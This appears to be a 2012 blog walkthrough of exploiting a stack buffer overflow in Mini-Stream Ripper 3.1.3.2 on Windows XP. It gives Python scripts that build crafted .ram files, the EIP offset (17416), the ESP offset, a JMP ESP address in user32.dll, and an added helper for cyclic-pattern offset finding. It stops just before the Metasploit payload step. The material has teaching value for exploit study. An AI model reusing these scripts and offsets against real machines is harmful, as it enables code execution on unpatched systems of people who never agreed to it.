Monday, February 20, 2012

Mini-Stream Ripper 3.1.3.2.2010.06.13 Buffer Overflow

# Exploit Title: Mini-Stream Ripper 3.1.3.2.2010.06.13 Buffer Overflow
# Link: http://mini-stream.net/mini-stream-ripper/download/
# Version: 3.1.3.2.2010.06.13
# Tested on: Microsoft Windows XP SP 2

OK, I have this fuzzer, and I'll try to exploit this application with it. The fuzzer:

# Constructed .ram file: a URL prefix followed by 18000 'A' bytes (Python 3, written as bytes)
wed = b"http://."
wed += b"\x41" * 18000
with open("dos.ram", "wb") as f:
    f.write(wed)

Let's try to catch that. First, prepare Immunity Debugger, the fuzzer and Mini-Stream Ripper. Then run the application from Immunity; when I load the file from my fuzzer, I find that the application crashes at 18000 chars, and I can see that EIP is overwritten with 414141. We know this is a direct RET overwrite, so this will be easy. Now I try to find at how many bytes EIP is overwritten, using pattern_create from the framework. EIP is overwritten with the chars 69573569 and ESP points at Wi8Wi9Wj0. After this, we can find out at how many bytes the registers are overwritten using pattern_offset.
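Added example (not code from the post): a small Python 3 reimplementation of the cyclic-pattern technique described above, so the register offsets can be checked offline without the Metasploit scripts. pattern_create builds the same Aa0Aa1...-style pattern as the tool the post names; pattern_offset takes the register value the debugger shows (an integer, which sits little-endian in memory, or the string seen at ESP) and returns where it lies in the pattern. The 18000-byte pattern length, the EIP value 69573569 and the ESP bytes Wi8Wi9Wj0 come from the post; the function names are my own.

```python
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGIT = string.digits


def pattern_create(length):
    """Build a cyclic pattern of the given length: Aa0Aa1Aa2...Aa9Ab0... (digit cycles
    fastest, then the lowercase letter, then the uppercase one). One full cycle is
    26*26*10*3 = 20280 bytes; every 4-byte window inside a cycle is unique."""
    out = bytearray()
    while len(out) < length:
        for u in UPPER:
            for l in LOWER:
                for d in DIGIT:
                    out += (u + l + d).encode()
                    if len(out) >= length:
                        return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length=18000):
    """Return the index in the pattern at which `value` appears, or -1.

    `value` may be an int (a 32-bit register value as the debugger prints it; it is
    packed little-endian, since that is the byte order in which it was read from the
    input) or a str/bytes (the text seen at an address, e.g. what ESP points to)."""
    pattern = pattern_create(length)
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    elif isinstance(value, str):
        needle = value.encode()
    else:
        needle = bytes(value)
    return pattern.find(needle)


def triage_offsets(eip_value, esp_value, length=18000):
    """Offsets of EIP and ESP in the pattern plus the gap between the end of the
    4-byte EIP slot and the first byte ESP points to."""
    eip = pattern_offset(eip_value, length)
    esp = pattern_offset(esp_value, length)
    gap = esp - (eip + 4) if eip >= 0 and esp >= 0 else None
    return {"eip": eip, "esp": esp, "gap": gap}


if __name__ == "__main__":
    # Values from the post: EIP = 69573569, ESP -> "Wi8Wi9Wj0", 18000-byte input
    print(triage_offsets(0x69573569, "Wi8Wi9Wj0"))
```

The EIP value is packed little-endian on purpose: the debugger shows 69573569, but the bytes in the file were 69 35 57 69 ("i5Wi"), which is what has to be searched for.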

ESP hits at byte 17424 and EIP at byte 17416. Now I'll use this fuzzer to confirm the EIP offset:

# Constructed .ram file: 17416 bytes of padding (offset measured after the prefix),
# then a 4-byte marker that should show up in EIP as DEADBEEF
wed = b"http://."
wed += b"\x90" * 17416
wed += b"\xEF\xBE\xAD\xDE"
with open("dos.ram", "wb") as f:
    f.write(wed)

And EIP changes to DEADBEEF. After this, I'll try to find a JMP ESP, let's go find it :D
With this fuzzer I find the address of a JMP ESP in user32.dll at 77D8AF0A.

prefix = b"http://."
wed = prefix
wed += b"\x90" * 17416            # padding up to the saved return address (offset measured after the prefix)
wed += b"\xEF\xBE\xAD\xDE"        # 4-byte marker that lands in EIP
# pad up to the ESP offset; the offsets exclude the prefix, so subtract its length
# (the original subtracted the whole length, which went negative and produced no padding)
wed += b"\x90" * (17424 - (len(wed) - len(prefix)))
wed += b"\xCC" * (18000 - len(wed))  # fill the rest with INT3 so the debugger stops where ESP lands
with open("dos.ram", "wb") as f:
    f.write(wed)

Now I try to exploit this application with a payload from Metasploit.
